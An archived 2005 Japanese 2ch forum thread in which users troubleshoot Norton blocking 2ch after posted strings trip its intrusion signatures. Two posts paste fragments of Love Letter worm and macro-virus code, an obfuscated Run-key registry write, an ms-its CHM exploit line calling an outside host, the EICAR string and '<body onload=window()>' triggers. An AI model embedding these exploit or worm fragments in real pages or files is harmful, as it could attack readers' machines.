X



ノートン誤作動対策本部

■ このスレッドは過去ログ倉庫に格納されています
1動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:08:40ID:bR9gbCGm0
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
2005/12/01(木) 23:47:29ID:rKQDZ2GC0
Mac使いはだあっとれ!
491動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 23:49:34ID:BF/Q6J/m0
>>488
誤作動するのは2chだけか?

>>489
代わりは? マックか? リナか? トロンか?

OS換えるよりFW交換の方が安くて早い。
選択肢もOSより多い。

なにより
「ゲイツさん、ノートンが誤作動します。OS代金返して」
「ノートンに言え。他のソフトじゃ誤作動しない。」
で終了。
2005/12/01(木) 23:58:45ID:UY8lxahn0
>>486
えーと、言葉足らずだったかな
めんどくせーのは、検出されるたびにそのIPを信頼リストに入れるのが、ってこと
(ま、2chすべて信頼済みにすればいいんだろけど)
実動作しない単に貼られた文字列に反応するノートン先生もトンチキだけど、
そもそもそういうのを貼るのが困ったもんだわ('A`)
2005/12/02(金) 00:06:32ID:f/DdBIuN0
自殺したとか言ってたのに今日も元気に2chかよ磊厨w
2005/12/02(金) 00:44:36ID:qGXnD/Au0
再インストールしたら、問題解決した。
ノートン側が対応したのかな。
2005/12/02(金) 01:01:34ID:E1VjDr3W0
アップデートしてないからだろ
2005/12/02(金) 02:32:13ID:GJg9CYrP0
ワロス
2005/12/02(金) 09:34:49ID:iz9f1dAv0
INSの除外にbody onload=w**w()を追加じゃ駄目なの?
2005/12/02(金) 11:12:45ID:cheTjBMl0
181 ◆Reffiz2Zh. sage 2005/11/28(月) 11:34:22 ID:BlBjwc9/0
>178
新手のノートントラップです。
ここじゃ、明かせないのでメールにて説明しますね。
186 ◆MUMUMUhnYI sage 2005/11/28(月) 11:51:32 ID:/3xX5FyA0
>>181
メール届きました。
ううむ。なんだかなぁ。
188 ◆MUMUMUhnYI sage 2005/11/28(月) 11:52:48 ID:/3xX5FyA0
とりあえず、問題の本質は理解したです。
ノートントラップというか、問題はもっと根が深いかんじですね。
公開情報ではありますが、確かに現段階では、ここに書くのははばかられるです。
194 ◆MUMUMUhnYI sage 2005/11/28(月) 11:56:51 ID:/3xX5FyA0
ひとことだけ。
「ノートンから除外した場合(というか一般的に当然ですが)には、
不審なリンクは不用意にクリックしない」
とゆうことで。


・・・なんか裏で極秘プロジェクトでも進んでるの?
2005/12/02(金) 11:32:13ID:CS5/4izN0
>>498
公開の場に詳しく書くと、見る人が見た時悪用できるって事だと思う。
最後のは「ノートンの防御機能を無効にしたらユーザーが気をつける」
むむむさんが書いてる通り当然のこと。
ってかノートン入れてても怪しいリンクを安易に踏まないのは基本。
500大空寺あゆ親衛隊 HELVA ◆THYOQYTAXA
垢版 |
2005/12/02(金) 11:46:51ID:ha+3nG/10
ウチも2ちゃんねるをおうえんしています
501動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 13:07:35ID:cnBkrw7B0
もう落ち着いたのか?
2005/12/02(金) 13:32:17ID:cheTjBMl0
>>499
なるほど、納得
2005/12/02(金) 13:34:57ID:NVBOvwGY0
侵入防止のHTTP MSIE javaScript OnLoad Rte CodeExecに
更に細かく除外するコンピュータの設定がついてれば今より少しは安心出来るのに
まあそこまで細かくしすぎると管理し辛いか
2005/12/02(金) 14:52:00ID:8ba/exXp0
昨日からノートン入れた者なのですが
ニュー速のスレを開いたら何者かが侵入を試みたので防ぎましたみたいなのが
出てそれからΝ速、+、共に見れなくなりました・・・
2005/12/02(金) 14:54:05ID:kr+j+cUM0
このスレ全部読めばそんな書き込みしなくても解決するだろうに・・・
2005/12/02(金) 15:22:07ID:qr3dRIBW0
とりあえず解決しますた。
このスレのおかげでつ
2005/12/02(金) 16:28:38ID:Pk54sSfs0
>>503
確かにな。「2ch鯖からのHTTP MSIE javaScript OnLoad Rte CodeExec検知」だけ
除外できれば言うことなしだったのに。
2005/12/02(金) 16:52:13ID:tIJ8d4TQ0
金払ってるのが馬鹿らしくなる。
2005/12/02(金) 18:23:29ID:kFY/QJAu0
>>265
どもですよ
510動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 20:42:10ID:IHq1xYI10
<body onload=window()>
テスト
511動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 22:05:12ID:h5gB50Dy0
>>510
氏ね。
512動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 22:07:34ID:6e6XLCLy0
>>511
<body onload=window()>
513動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/03(土) 00:55:30ID:r4GdU0C10
あぼーん
514動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/03(土) 10:44:32ID:F4mYTX8O0
これが原因だったのか!!!
515動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/03(土) 10:55:30ID:5PagNx8c0
今は間カフィのほうのPCでアクセスしてるからこのスレがちゃんと見えるけど、
野トンだと>>509以降の表示がぶっ壊れるよ
なにやってんだかな、野トン先生orz
516シラネーヨ
垢版 |
2005/12/03(土) 11:15:23ID:H4hlwyNK0
シラネーヨ
2005/12/03(土) 20:13:14ID:xBom7gmX0
どれどれ。実験。

c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub
2005/12/03(土) 20:49:29ID:3AOyRztk0
      ∬
      酒 (´д`)  < 俺、知ってるよ…。
     ========  \
   /※※※※ゞノ ,_)
  ~~~~~~~~~~~~~~~~
2005/12/03(土) 23:28:01ID:MCEAT7+b0
>>493
磊厨どこにいるの!?
2005/12/04(日) 01:26:29ID:eoIfSVsw0
>>517
反応した・・・。
521動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/04(日) 04:28:24ID:X+Ww/b+O0
>>510
氏ね

>>512
お前も氏ね

>>517
お前は氏ねじゃなくて死ね!
522動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/04(日) 04:37:08ID:h85ucp1x0
かきこむ
523動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/04(日) 12:26:49ID:50GK9X4n0
英語ばかりで読めないな。
2005/12/04(日) 12:37:37ID:EpZg83SWO
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub
2005/12/04(日) 12:57:25ID:S0JmhzX20
>>512とか>>517とかの文字列が反応するのって、
どういう誤認で誤作動するわけ?具体的に頼む
NGNG
>525
>>22の記事を読めばなんとなくわかるかと。
2005/12/04(日) 20:13:57ID:S0JmhzX20
>>526
d
2005/12/05(月) 01:34:57ID:FdnPK1jR0
>>517の本文は専ブラのログフォルダを除外対象にしとけば無問題
2005/12/05(月) 17:48:16ID:5iffv5U70
ホントに無問題なのか!?
確かに反応はしなくなるが、それを逆手に利用しLogフォルダを狙ってくるかもと妄想してみる
まだじゃまくさいが*.dat毎に設定した方が…
2005/12/05(月) 18:11:55ID:b5q7G/4D0
そう思うなら、そうすればいいじゃない。
2005/12/05(月) 18:29:11ID:uXQGgEEr0
無問題という発言には問題があるよな
2005/12/06(火) 15:43:56ID:LkdisUM70
>>697
ノートン誤作動対策本部
http://qb5.2ch.net/test/read.cgi/operate/1133161720/
ここをミロ
2005/12/06(火) 15:45:13ID:yXevFHab0
>>697ちゃんとミロよ
2005/12/06(火) 15:45:56ID:FdwqPeUF0
>>697
ちゃんと見なきゃだよ〜〜
2005/12/06(火) 15:49:22ID:S/1II8Rk0
>>697
わかったか?
よし、わかったんなら席に着け。
2005/12/06(火) 16:59:02ID:ba9NK7rA0
>>697
笑ったり泣いたり出来なくしてやる!
2005/12/07(水) 15:54:11ID:h/m9952k0
>>697
( ´д)ヒソ(´д`)ヒソ(д` )
2005/12/07(水) 16:40:37ID:aPTNAClw0
>>697
まるでそびえたつクソだ!
2005/12/07(水) 20:54:02ID:zqDlR1140
>>697ちゃんったらー、ちゃんと見てないからそうなるんだよ。
まったくもー。
2005/12/07(水) 22:38:17ID:p1e7f/VT0
ノートンの
侵入阻止→拡張→HTTP MSIE javaScript OnLoad Rte CodeExec
のチェックはずして、
オミトロンの
Onload Unloader
をオンにスルだけで解決するんだが。

何をそんなに騒ぐ。
2005/12/07(水) 23:44:58ID:KWMarFNX0
はいはい
2005/12/08(木) 01:43:07ID:J0d2TFmr0
専ブラはdatしか読みに行かないから、ノートンのチェック外しても
何ら問題は無い。

問題はIEの味噌も糞も一緒くたにとっとくテンポラリフォルダだ。
これもブラウザ閉じた時にキャッシュを削除する設定にしておけば
多少は安心だろう。
2005/12/08(木) 20:46:26ID:vweIWjoM0
ノートンのインジケータを隠してたから長いこと原因に気付かなかった
やれやれ・・・
544動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/10(土) 21:42:55ID:L+GgO2q30
いきなりフジ実況見れなくなった。。。
まとめサイトの対策してるのに
2005/12/11(日) 09:53:51ID:UxoL4GzC0
うpdateしたら反応しなくなったぞ
2005/12/11(日) 10:27:46ID:NT8ogfEm0
>>697まで先は長いなw
2005/12/11(日) 19:58:01ID:u72QiQwD0
>>697がとって置きのレスをするでしょうw
2005/12/12(月) 07:35:05ID:Oxp01vs20
>>545
なわけねーだろボケ
549動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/12(月) 23:00:52ID:6AEQSNlY0
<body onload=あwindow()> ms-its:あmhtml:file://c:\

誤作動うぜぇー
550動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/13(火) 00:03:08ID:EccYzO0u0
2005/12/13(火) 00:14:46ID:mrrPdy+U0
最近書き込みが減ったところを見ると、双方対策されたって事?
2005/12/13(火) 00:15:43ID:VF/WnYDZ0
>>551
片方が対策しただけのような気がする。
2005/12/13(火) 00:16:24ID:jbIWO4hy0
暫定処置で凌いでる、ここを見られないのどちらかかと
2005/12/13(火) 00:37:32ID:mrrPdy+U0
なるほど。
それなりに情報も行き渡ったって事ね、了解。
2005/12/13(火) 01:15:55ID:ct+jZ+de0
ノートンの信頼ゾーンから例のアドレス群を削除してもまったく問題なし。
どうやらこの前のupdateで、Symantecが対応したようだ。
まあ、定義ファイルちょこっといじるだけだしね。
2005/12/13(火) 01:24:49ID:+TojAte/0
まじで?ついに対応したのかノートン先生!
2005/12/13(火) 01:27:38ID:P59zanKB0
俺駄目だったけど o.......rz
2005/12/13(火) 01:49:57ID:4oy/C4vr0
全然だめだった2005
2005/12/13(火) 07:12:17ID:yYTaEYqU0
2006でアップデートしてみた
何故か専用ブラウザ(JaneDoeView)だと問題なくなったけど
IEで見ると以前と同じように侵入防止される
2005/12/13(火) 10:52:51ID:LUKc0KsC0
>>555
なわけねーだろボケ
2005/12/13(火) 13:26:01ID:Mc0lYOUq0
2chブラウザを使ってると、ログの再取得をしないから、反応しないだけ。
ログを一旦消して、誤爆文字列を再読み込みさせると遮断されるよw
2005/12/13(火) 16:33:49ID:Fiu/blpC0
ん?
2005+かちゅだけど、ログ消して再取得してもまったく問題ないよ。
確かこのスレにもコード張ってあったよね。
該当スレ削除されてるのかな?
数日前から信頼ゾーン元に戻してあちこち見てるけど、一度も遮断は起きてない。
2005/12/13(火) 16:46:09ID:e28xE5tY0
信頼解除してこのスレ再取得で問題なし
ログ削除してJane再起動してこのスレ取得してみたけど問題なし
2005/12/13(火) 16:47:53ID:e28xE5tY0
今IEも試したけど大丈夫みたい
2005/12/13(火) 17:19:46ID:LUKc0KsC0
なわけねーだろボケ
2005/12/13(火) 17:50:38ID:EccYzO0u0
どこまでが釣りなのか見極めがむずい
2005/12/13(火) 18:56:54ID:i8UVIJLB0
普通にノートン対応してない
NGNG
↑普通にニートンって見えた
2005/12/13(火) 20:41:24ID:yYTaEYqU0
>>561
ちゃんと消してからやってるけど?
とりあえず自分で検証してから煽りいれないとただの恥ずかしい人だぞ
2005/12/13(火) 21:21:25ID:qGOg/NGt0
今日2006インスコ→LiveUpdateした後
JaneDoeStyleでこのスレ開いてみたけど大丈夫でした。
(もちろん、ログ再所得済)
ただし>>559同様、IEはダメ。
一度IEで開くと、その後はJaneでもダメ。

2005/12/13(火) 21:31:58ID:VBj/AhMS0
ノートン先生はいったいどんな対策を施したんだろう、、、
2005/12/13(火) 21:39:18ID:mvJZvZGa0
2ch側で何か対策した?
専用ブラウザでの閲覧は現在問題無しみたいだ。
もちろんログ消去をやった上で。
少なくても日曜日の段階では、自分も専用ブラウザの閲覧でトラップに引っ掛かっていた。


317 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 14:25:00
2005は直ってないの?直ってたら乗り換えようと思ってるんだけど

318 名前:名無しさん@お腹いっぱい。 [] 投稿日:2005/12/11(日) 14:50:13
2006が直った言うのはマジですか?

319 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 14:58:53
2006直ってないよ。
シグネチャ更新しても、問題のヤツはそのまま残ってて、いきなり遮断されたしw
プログラム本体の更新が無い限り直らんでしょ?これ。
ホントに直った人いるの?

320 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 15:00:33
また工作員の虚言か!

321 名前:297 [sage] 投稿日:2005/12/11(日) 15:00:54
ありがとう。
やってみるよ。

322 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 15:27:18
あれ・・・DL板で更新したら問題なく更新されたんで直ったと思ったが何回かやってると遮断してるな・・@2004
なんじゃこりゃ


で、IEによる閲覧では現在も遮断される事から、最新のアップデートでもノートントラップが対応出来ていないのは明らか。
どーなってんの???
2005/12/14(水) 12:27:12ID:WvVfrDFo0
ノートンLiveUpDateしますた。
シマ対応した模様。
この問題については、解決したのでは。
2005/12/14(水) 12:54:03ID:4UluMZjh0
>>573
全然対応してないから。
2005/12/14(水) 13:00:51ID:WvVfrDFo0
↑具体的に
2005/12/14(水) 13:30:12ID:gN/cypwS0
2003+かちゅでは駄目だった
577570
垢版 |
2005/12/14(水) 13:38:58ID:065kioyb0
>>573
Updateしてみましたが、やはりIEでは遮断されました。
578動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/14(水) 15:21:30ID:B2e/IoHz0
工作員ウザ杉

本気で売買契約解消しようと思うんだが、
誰かシマンテックと交渉した奴いる?

これはOSのせいじゃなく「ノートンのFWだけ」の誤作動だから
返品できるよな? 交渉は小売とした方が良いのか?
2005/12/14(水) 15:21:38ID:lH3ozVBK0
2006で、ここのログを取得してみた。(専ブラはログを破棄して再取得)
専ブラ(Live2ch、かちゅ)では遮断されなかった。
普通のブラウザ(IE、Opera)だと遮断された。
うーん、不思議。
2005/12/14(水) 15:41:34ID:J+E7KJcf0
>>578
がんばれ馬鹿。
負けるな馬鹿。
2005/12/14(水) 15:57:29ID:B2e/IoHz0
>>580
プ 工作員必死だなw

都合が悪いレスを煽って誤魔化すってことは
やっぱり返品出来るんだなw

そりゃそうだ他社のFWじゃ誤作動しなくて
ノートンだけ誤作動じゃ言い訳できないもんな。

工作員の必死さから良く分かった。
返品の話が都合悪いの?w んー?w 悪いの?w
2005/12/14(水) 16:01:29ID:lfvSkMHa0
誤作動ではなく危険なコードは完全に弾く仕様になっております。
もし、信用できるサイトの観覧に不都合が生じた場合は
そのサイトを信頼ゾーンに追加して下さい。

と。
2005/12/14(水) 16:09:17ID:B2e/IoHz0
>>580
>サイトの観覧に不都合が生じた場合は
>そのサイトを信頼ゾーンに追加して下さい。

いやだ。

信用できるかどうか分からんからFW入れてんだよ。

それに今回は

「サイトの観覧に不都合が生じた場合は〜」 じゃねーだろ?
「FWのコード識別に不具合が生じてる」

「不都合」でなく「誤作動」
2005/12/14(水) 16:27:23ID:lfvSkMHa0
>>583
お客様、何度も申し上げますが誤作動ではなく仕様です。
なにとぞ御理解下さい。

分かりやすく説明するとこうなる↓

ハァ?どーでもいい一般ユーザーは黙ってろっての!
グチグチうるせーな。
スキル無いボケが生意気いってんじゃねーよ!!

返金?返品?シラネーヨ!

嫌なら裁判でも起こせばいいだろー
知識の無い裁判官言いくるめる弁護士雇う金がこっちにはあるんだボケ!!
ネットで吠えてねーでやってみろ根性なしが(ププp
2005/12/14(水) 16:46:20ID:a5x2HY3T0
ついさっきWindows Updateの通知があったんだけど
これってノートン先生誤作動の元になったセキュリティホールとは無関係ですか?

http://www.microsoft.com/japan/security/bulletins/ms05-054e.mspx
2005/12/14(水) 16:56:53ID:JiKINitk0
>>585
対応したみたいだね
それでもupdateしない馬鹿がいるかもしれないから誤作動を続けるであろうノートン先生に敬意を示さねば

http://pcweb.mycom.co.jp/news/2005/12/14/007.html
2005/12/14(水) 17:01:46ID:JiKINitk0
>>586
一応コピペ

>「不適切な Document Object Model オブジェクトのメモリ破損の脆弱性」は、
>JavaScriptでwindow()イベントが使われた場合に任意のコードが実行されるというもの。
>ネット上では5月にすでに情報が公開され、この脆弱性を悪用するトロイの木馬も登場しており、
>ユーザーは至急パッチを適用すべきだ。
2005/12/14(水) 17:45:49ID:GDsyONUI0
Windows UpdateもノートンのUpdateもしたけど駄目だったよ・・・ orz
2005/12/14(水) 18:07:11ID:UojIzTZi0
>>588
同じく駄目でしたヽ(゚∀゚)ノ
■ このスレッドは過去ログ倉庫に格納されています
5ちゃんねるの広告が気に入らない場合は、こちらをクリックしてください。

ニューススポーツなんでも実況